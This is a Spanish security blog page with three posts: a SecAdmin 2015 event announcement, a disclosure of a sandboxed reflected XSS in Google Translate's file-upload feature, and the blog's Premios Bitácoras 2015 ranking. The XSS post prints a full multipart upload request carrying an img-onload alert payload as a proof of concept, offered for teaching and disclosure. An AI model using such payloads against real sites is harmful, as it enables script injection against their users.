Novedades SecAdmin2015

Hola a tod@s

Atención, como saben faltan 11 días para el evento y lo tenemos casi todo listo.

Los talleres tienen una capacidad de 30 personas por Taller, por lo que vamos a publicar un formulario para que se puedan inscribir. 

Daremos prioridad por orden de inscripción a nivel de segundos. Así que estar atentos.

El día de apertura en donde publicaremos el enlace por email, facebook, twitter y en nuestra Web. Será el día Martes 8 a las 00:01 minuto.

El día que publicaremos el CTF, será el dia Jueves 10 a las 00:01.

El otro día estuvieron nuestros compañeros Adrián y Jorge en NEO FM, si te has perdido el programa, nos puedes escuchar aquí: http://www.ivoox.com/9525073 estuvieron hablando con algunos de los ponentes y los que darán talleres, así que si quieres saber de qué van algunos talleres, te recomiendo que lo escuches.

Por otro lado, como saben el evento se realizará en la Facultad de Informática y tanto la merienda del viernes, el desayuno y la merienda del día sábado, se incluye con la entrada, y se realizará en la cafetería de la facultad de la Escuela de Informática.

Para los que quieran quedarse a almorzar el sábado día 12. Podrán hacerlo a un precio especial para el evento. A precio de universitario por menos de 6 euros el menú. Más adelante les contaremos en qué consiste el menú y qué incluye.

La agenda está casi cerrada, la pueden ir consultando en www.secadmin.es

Cualquier duda puede enviar un email a info@secadmin.es

El día viernes 11 de diciembre, estaremos vendiendo entradas de última hora a partir de las 15:00 horas.

Recuerda, que para poder asistir a los talleres, debes de tener tu entrada previamente. No permitiremos la entrada a ninguna persona que no esté debidamente acreditada.

Puedes conseguir tu entrada aquí.

No seáis malos.

El NO Cross-Site Scripting de Google

Hola a tod@s

El pasado día utilizando el traductor de Google me fije en una funcionalidad adicional que tiene el traductor, y es que nos permite la subida de ficheros para su traducción.

Inmediatamente me puse a analizar el servicio, cuál fue mi sorpresa cuando descubrí un XSS, Google no lo consideraba un riesgo, pues no tiene impacto porque se encuentra dentro de un sandbox, sea como fuere lo he querido traer aquí por su contenido didáctico y enseñar para el que no lo conozca.

En  primer lugar visitamos la dirección https://translate.google.es/?hl=es y hacer click en traducir un documento.

Imagen 1: https://translate.google.es/?hl=es

Subimos nuestra prueba de concepto y subimos.

 

Imagen 2:  Upload del fichero

Imagen 3: Traducir el documento

Por último podemos visualizar el XSS reflejado.

Imagen 4: XSS en el traductor de Google

A continuación la petición de Burp:

POST /translate_f HTTP/1.1
Host: translate.googleusercontent.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://translate.google.es/?hl=es
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------147452561017500
Content-Length: 1095

-----------------------------147452561017500
Content-Disposition: form-data; name="sl"

en
-----------------------------147452561017500
Content-Disposition: form-data; name="tl"

es
-----------------------------147452561017500
Content-Disposition: form-data; name="js"

y
-----------------------------147452561017500
Content-Disposition: form-data; name="prev"

_t
-----------------------------147452561017500
Content-Disposition: form-data; name="hl"

es
-----------------------------147452561017500
Content-Disposition: form-data; name="ie"

UTF-8
-----------------------------147452561017500
Content-Disposition: form-data; name="text"


-----------------------------147452561017500
Content-Disposition: form-data; name="file"; filename="poc.html"
Content-Type: text/html

<img src="http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg" onload="alert('XSS en Google AUDIT')"</img>
-----------------------------147452561017500
Content-Disposition: form-data; name="edit-text"


-----------------------------147452561017500--
 

Tras notificarlo a Google me informaron que no se considera un riesgo, pues está dentro de la sandbox, por lo que no afecta al bugbounty.

No seáis malos.

Actualización 15/12/2015

Medios que se han hecho eco del hallazgo:

- http://news.softpedia.com/news/google-translate-website-affected-by-xss-bug-google-says-it-s-ok-496819.shtml

 - http://es.egg-life.net/article/166009

 - http://www.securitynewspaper.com/2015/11/28/google-translate-website-affected-xss-bug-google-says-ok/

-  http://tech.163.com/15/1128/10/B9GK29TO000915BF.html

-  http://www.ssa.gov.za/Portals/0/SSA%20docs/CSIRT/ICT%20Security%20Monitoring%20Services%20Report%2030%20November%202015.pdf

-  http://www.smokey-services.eu/forums/index.php?PHPSESSID=s3j7v7g53dfunf7lacgqbnlaf5&topic=307564.msg357442#msg357442

-  https://securemoz.com/google-translate-website-affected-by-xss-bug-google-says-its-ok/

- http://www.newsunited.com/google-translate-website-affected-news/19961277/ 

Premios Bitacoras 2015

Hola a tod@s

Un año más se ha celebrado los premios bitácoras en los que se votan los mejores blogs de habla hispana en categorías como blogs de salud e innovación, economía, arte y cultura, gastronomía, viajes o nuestra categoría seguridad informática.

Este año hemos quedado en el puesto 13º de 95º un puesto nada despreciable teniendo en cuenta que el periodo de votación del 22 de septiembre al 19 de noviembre en el que se da a conocer los 3 finalistas y nosotros nos presentamos muy tarde en la clasificación parcial V, a principios de noviembre.   :-)  Por ello estamos gratamente sorprendidos.

A continuación os mostramos la clasificación:

Finalistas:

1.		El Lado Del Mal	[ perfil ]
2.		Oficina De Seguridad Del Internauta	[ perfil ]
3.		Globb Security	[ perfil ]

Resto de clasificados:

4.		Pabloyglesias	[ perfil ]
5.		Hackplayers	[ perfil ]
6.		El Blog De Angelucho	[ perfil ]
7.		Underc0De Blog	[ perfil ]
8.		Security By Default	[ perfil ]
9.		Security Art Work	[ perfil ]
10.		Gurú De La Informática	[ perfil ]
11.		Las Luces Del Sotano	[ perfil ]
12.		Rootbyte	[ perfil ]
13.		Estación Informática	[ perfil ]
14.		Blog.isecauditors.com	[ perfil ]
15.		Hispasec @unaaldia	[ perfil ]
16.		Comunidad Dragonjar	[ perfil ]
17.		Marina Brocca	[ perfil ]
18.		Seguridad Informatica "a Lo Jabali ..."	[ perfil ]
19.		Hormigas En La Nube	[ perfil ]
20.		Inseguros	[ perfil ]
21.		Flu Project	[ perfil ]
22.		Pci Hispano	[ perfil ]
23.		Blog - S3Lab	[ perfil ]
24.		3J Kernel	[ perfil ]
25.		Blogoff	[ perfil ]
26.		Maestros Del Web	[ perfil ]
27.		Spamloco	[ perfil ]
28.		Hacking Publico	[ perfil ]
29.		Infospyware	[ perfil ]
30.		Rootear	[ perfil ]
31.		David Acosta	[ perfil ]
32.		Daboblog	[ perfil ]
33.		Hacking Ético	[ perfil ]
34.		Incibe	[ perfil ]
35.		Areópago 21	[ perfil ]
36.		Segu-Info	[ perfil ]
37.		Hack X Crack	[ perfil ]
38.		Tortilla De Seguridad	[ perfil ]
39.		Un Tal 4N0Nym0Us En El Pc	[ perfil ]
40.		Blog Kpmg Ciberseguridad	[ perfil ]
41.		Snifer@l4B's	[ perfil ]
42.		Elevenpaths Blog	[ perfil ]
43.		Blog Laboratorio Hispasec	[ perfil ]
44.		Codigobinario	[ perfil ]
45.		Información Legal De Internet	[ perfil ]
46.		Tecnovirus.com	[ perfil ]
47.		Hackpuntes	[ perfil ]
48.		Nogueratech.com	[ perfil ]
49.		S21Sec Blog. Seguridad Digital.	[ perfil ]
50.		Informático De Guardia	[ perfil ]
51.		Cigtr	[ perfil ]
52.		Kriptópolis	[ perfil ]
53.		Cyberhades	[ perfil ]
54.		Hardwareysoftware.net	[ perfil ]
55.		Exefull	[ perfil ]
56.		Ricardo Vega	[ perfil ]
57.		El Blog Del Perito Informático Forense	[ perfil ]
58.		Cl0Udswxsequre	[ perfil ]
59.		Genbeta	[ perfil ]
60.		Seguridad De La Información Bugbu5T3R5	[ perfil ]
61.		Thehackerway (Thw)	[ perfil ]
62.		Solucionavirus.com	[ perfil ]
63.		Blog Elhacker.net	[ perfil ]
64.		Ayuda Wordpress	[ perfil ]
65.		Seguridad Apple	[ perfil ]
66.		Toques De Seguridad	[ perfil ]
67.		Ciudadano 2.0	[ perfil ]
68.		Contraespionaje	[ perfil ]
69.		El Abogado Digital	[ perfil ]
70.		Dragonjar.com	[ perfil ]
71.		Mundo Hacker	[ perfil ]
72.		Silleros Viajeros	[ perfil ]
73.		Bitácora De Redes	[ perfil ]
74.		Itaseg | Itati Seguridad Informática	[ perfil ]
75.		Computestonline.blogspot.com	[ perfil ]
76.		Exceltotal.com	[ perfil ]
77.		365 Días De Valentía Moral	[ perfil ]
78.		Foro De Infospyware, Virus, Malwares	[ perfil ]
79.		Linuxparty	[ perfil ]
80.		Spn 3.14 Versión 1.1.2.3.5.8	[ perfil ]
81.		[A]Ntrax - [L]Abs	[ perfil ]
82.		Nexustutoriales	[ perfil ]
83.		Lachisterablanca.com	[ perfil ]
84.		Microsiervos	[ perfil ]
85.		Segu-Info.com.ar	[ perfil ]
86.		Gnumax	[ perfil ]
87.		In Seguros	[ perfil ]
88.		Conexión Inversa	[ perfil ]
89.		Vintegris	[ perfil ]
90.		Integra	[ perfil ]
91.		Ochobitshacenunbyte	[ perfil ]
92.		La Mirada Del Replicante	[ perfil ]
93.		Hojas De Cálculo Y Más	[ perfil ]
94.		Exevi	[ perfil ]
95.		Mamá Es Una Friki	[ perfil ]

Muchas Gracias a todos los nos habéis votado, a todos los que hacéis posible este proyecto nuestros lectores y gracias a todos los que formáis Estación Informática autores y colaboradores.

No seáis malos.